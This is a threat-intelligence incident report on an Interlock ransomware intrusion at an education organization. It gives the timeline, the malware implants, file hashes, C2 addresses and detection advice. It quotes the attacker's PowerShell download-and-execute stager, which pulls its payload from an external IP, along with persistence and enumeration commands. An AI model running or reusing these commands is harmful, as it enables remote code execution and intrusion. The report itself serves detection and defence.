The Interlock ransomware group continues to target organizations globally, with a pronounced focus on entities in the United Kingdom and the United States—particularly within the education sector. The FortiGuard Incident Response team remains engaged in monitoring the residual impact of earlier campaigns attributed to this threat actor. Unlike many prominent ransomware operations that rely on a Ransomware-as-a-Service (RaaS) framework, Interlock operates as a more centralized and self-contained group. The operators appear to develop and deploy their own tooling across much of the attack lifecycle, maintaining tighter operational control over their malware ecosystem. Notably, the group has demonstrated a capacity to evolve its tradecraft, adjusting techniques and tooling in response to defensive countermeasures. This analysis details a recent intrusion attributed to Interlock and underscores the necessity of proactive threat hunting to uncover persistent or latent compromises. Early-stage indicators observed during this investigation align directly with artifacts documented in a July campaign reported by the eSentire Threat Response Unit, as well as components of the Interlock malware ecosystem previously analyzed by Mandiant. Additionally, this investigation uncovered new indicators that defenders should incorporate into their detection strategies as the group continues refining its operational toolkit. Of particular significance, the group has introduced a newly developed process-termination utility that exploits a zero-day vulnerability in a gaming anti-cheat driver. In the observed intrusion, this capability was leveraged in an attempt to neutralize the victim’s endpoint detection and response (EDR) and antivirus (AV) protections.
Initial Access:
On 31 March 2025, a North America–based education organization experienced an initial compromise attributed to a MintLoader infection. The intrusion originated from a user workstation that did not have endpoint detection and response (EDR) protection installed at the time. The compromise began with execution of a PowerShell command designed to dynamically retrieve and execute a remote payload. The command leveraged Invoke-Expression (iex) and Invoke-RestMethod (irm) to pull a second-stage script from a time-based URL hosted at 138[.]199[.]156[.]22:8080. The URL incorporated a Unix epoch-derived value, suggesting automated or programmatic payload generation. The command structure and infrastructure are consistent with activity previously linked to a TAG-124 traffic distribution system (TDS) campaign active during the same timeframe. Similar PowerShell patterns have been observed in prior Interlock ransomware intrusions, including reporting from Arctic Wolf. Interlock operators have historically leveraged TAG-124 infrastructure to selectively target victims across North America.
Following execution of the PowerShell stager:
- A file named download.zip was written to disk.
- The archive contained a legitimate Node.js runtime (node.exe).
- That runtime executed a malicious JavaScript payload:
- j1wp4vw8.log
- SHA1: 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0
- Payload Execution Command: powershell -w h -c "iex $(irm 138[.]199[.]156[.]22:8080/$($z = [datetime] :: UtcNow; $y = ([datetime]( '01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]: :Floor($x); $v = $w - ($w % 16); [int64]$v))"\1
NodeSnakeRAT operates as a staging implant, writing multiple secondary payloads to disk to facilitate follow-on activity. However, not all executed components generate file-system artifacts, meaning the observed payload set does not represent the complete scope of operator activity. Overall, this phase reflects a structured initial access workflow leveraging MintLoader delivery, time-based payload retrieval, legitimate runtime abuse (Node.js), and deployment of a modular access implant aligned with prior Interlock tradecraft.
Persistence and Follow-On Activity
On 31 March 2025, the threat actor established persistence for NodeSnakeRAT by creating an autorun registry entry labeled “ChromeUpdater” within the victim user’s profile. This entry was later modified to support updated NodeSnakeRAT payloads.
Three days after the initial execution of the first NodeSnakeRAT implant (j1wp4vw8.log, SHA1: 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0), a brief Remote Desktop Protocol (RDP) session was initiated on 3 April 2025. The connection originated from a temporarily assigned internal IP address and targeted the organization’s primary file server. The login utilized a default Administrator account that was not actively used by the organization.
On 21 April 2025, leveraging the existing NodeSnakeRAT foothold, the adversary deployed a second JavaScript-based implant:
- File Name : k4myle3i.dll
- SHA1 : 6445E5CE51DA03934395ABB5411D3200D12ED7B3
This payload represents an earlier variant of Interlock RAT, also tracked as WINDYTWIST.SEA by Mandiant and identified as Interlock Backdoor by eSentire.
Operational Dormancy and Infrastructure RotationAvailable evidence indicates minimal adversary activity in the months following initial compromise. Significant activity resumed on 5 September 2025, shortly after the adversary rotated their command-and-control infrastructure on 4 September 2025.
The compromised endpoint during this period was a user laptop that was infrequently connected to the corporate network. It is assessed that the limited network exposure and non-overlapping connectivity windows likely prevented the threat actor from performing effective lateral movement during this time.
Phase Two – Data Access and Exfiltration (05–15 September 2025)The second major phase of the intrusion began on 5 September 2025, when the victim’s Managed Detection and Response (MDR) service identified a similar NodeSnakeRAT infection chain on an internal application server.
Because the affected system was an internal server, no evidence of MintLoader or external initial access mechanisms was observed. Additionally, the reuse of the same Node.js runtime and related JavaScript payloads indicated this activity was a continuation of the earlier compromise rather than a new intrusion.
Using the existing foothold, the adversary deployed another Interlock RAT implant disguised as a log file:
- File Name : node.log
- SHA1 : 2D5F88C396553669BD50183644D77AD3C71D72BB
This implant contained newly hardcoded command-and-control infrastructure, indicating an evolution in tooling and operational configuration.
--Attack Lifecycle Overview--
1. Initial Access
- Delivery via malicious loader (e.g., MintLoader).
- Execution of obfuscated PowerShell commands.
- Retrieval of second-stage payloads from external infrastructure.
- Scheduled task creation for persistence.
- Registry autorun key modifications.
- Deployment of remote administration or RAT components.
- Use of a custom process-killing tool.
- Exploitation of a zero-day vulnerability in a legitimate gaming anti-cheat driver.
- Attempts to disable EDR and antivirus services.
- Enumeration of domain users and administrators.
- Network share discovery.
- Use of native Windows utilities for movement.
- Bulk data collection prior to encryption.
- Exfiltration to external command-and-control (C2) servers.
- Deployment of Windows and Linux ransomware encryptors.
- cmd.exe /c schtasks /create /sc onlogon /tn "Updater" /tr "C:\Users\Public\updater.exe"
- wmic process call create "C:\Users\Public\payload.exe"
- net user /domain
- net group "Domain Admins" /domain
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<malicious_entry>
- Scheduled Task: "Updater" or similarly disguised system task
- Unsigned or suspicious driver loading activity.
- Abnormal termination of EDR/AV processes.
- Driver exploitation linked to gaming anti-cheat software.
Investigations identified outbound connections to attacker-controlled infrastructure. Organizations should review logs for:
- Outbound HTTP/HTTPS traffic to newly registered domains.
- Connections to VPS-hosted IP addresses with no prior business justification.
- Beaconing intervals indicative of RAT activity.
Investigations identified outbound connections to attacker-controlled infrastructure. Organizations should review logs for:
- Outbound HTTP/HTTPS traffic to newly registered domains.
- Connections to VPS-hosted IP addresses with no prior business justification.
- Beaconing intervals indicative of RAT activity.
Below is the summary of execution observed during deployment of payloads on the victim's machine:
| Function | File (Name + SHA1) | File Path | Embedded C2 | First Observed |
|---|---|---|---|---|
| NodeSnakeRAT |
j1wp4vw8.log 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0 |
C:\Users\victim_user\AppData \Roaming\node-v22.11.0-winx64\j1wp4vw8.log |
216[.]245.184.181 212[.]237.217.182 168[.]119.96.41 suffering-arnold-satisfaction-prior[.]trycloudflare.com<, speak-head-somebody-stays[.]trycloudflare.com, mortgage-i-concrete-origins[.]trycloudflare.com, una-idol-ta-missile[.]trycloudflare.com, strain-brighton-focused-kw[.]trycloudflare.com, musicians-implied-less-model[.]trycloudflare.com |
31-March-2025 |
| InterlockRAT |
k4myle3i.dll 6445E5CE51DA03934395ABB5411D3200D12ED7B3 |
C:\Users\victim_user \AppData\Roaming\3o55fai8\k4myle3i.dll |
45[.]61.136.109 128[.]140.120.188 177[.]136.225.135 |
21-April-2025 |
| NodeSnakeRAT |
05x3aay1.log 677151B9864F8D01DE3C1557B1402AF7EF99AE3D |
C:\Users\victim_user \AppData\ Roaming\node-v22.11.0-winx64\05x3aay1.log |
37[.]27.216.30 66[.]85.173.36 146[.]70.79.43 nedy-throwing-knock-whats[.]trycloudflare[.]com, oclc-publishing-individual-maps[.]trycloudflare[.]com, cf1-winows-ww[.]com, time-syncmicrosoft[.]com, microsoft-iplcloud[.]com, sublime-tragedy-counties-sculpture[.]trycloudflare[.]com, champagne-businesses-hand-theta[.]trycloudflare[.]com, assets-msnds[.]org, settings-win-datamicrosoft[.]org, settings-datamicrosoft[.]org, periodic-priest-games-assessed[.]trycloudflare[.]com, uncertainty-por-bubble-persian[.]trycloudflare[.]com, eventsdatamicrosoft[.]org, dns-teams-windows[.]live, sync-time-win[.]live |
22-May-2025 |
| G-zip archive (Java env + jucheck.jar) |
9gesu23g.log F381C897A54B1A0A41D41F279ABA1B7C13E3F901 |
C:\Users\victim_user \AppData\Roaming\ywgomm2t\9gesu23g.log |
n/a | 24-June-2025 |
| InterlockRAT |
aqwsxvvz.log F3C2BDB4484F66213556B2CD5F114CE4F4A9DD86 |
C:\Users\victim_user \AppData\Roaming\dji8zg3d\aqwsxvvz.log |
157[.]250.195.229 216[.]219.95.234 91[.]98.29.99 |
04-September-2025 |
| InterlockRAT |
g86oofvm.dll F3C2BDB4484F66213556B2CD5F114CE4F4A9DD86 |
C:\Users\victim_user \AppData\Roaming\ro5ryxiu\g86oofvm.dll |
157[.]250.195.229 216[.]219.95.234 91[.]98.29.99 |
04-September-2025 |
File & Artifact Indicators
- Ransom note files dropped post-encryption.
- Encrypted files appended with extensions such as:
- .gif
- .!nt3rlock
- Malware loaders and executables in:
- C:\Users\Public\
- %AppData%\
- %ProgramData%\
- Monitor PowerShell activity with command-line logging enabled.
- Alert on unsigned driver loads or abnormal driver behavior.
- Inspect scheduled task creation events (Event ID 4698).
- Correlate unusual outbound traffic with newly observed domains or IP addresses.
- Hunt for abnormal termination of security processes.
- Apply security updates to endpoint and server infrastructure.
- Restrict administrative privileges using least privilege principles.
- Enable tamper protection on EDR/AV solutions.
- Implement network segmentation and outbound traffic filtering.
- Conduct proactive threat hunting based on known Interlock TTPs.
Interlock continues to evolve its techniques while maintaining a consistent operational methodology. The integration of zero-day exploitation, custom tooling, and targeted exfiltration underscores the need for proactive monitoring, robust endpoint defenses, and structured threat hunting programs.
Reference Links: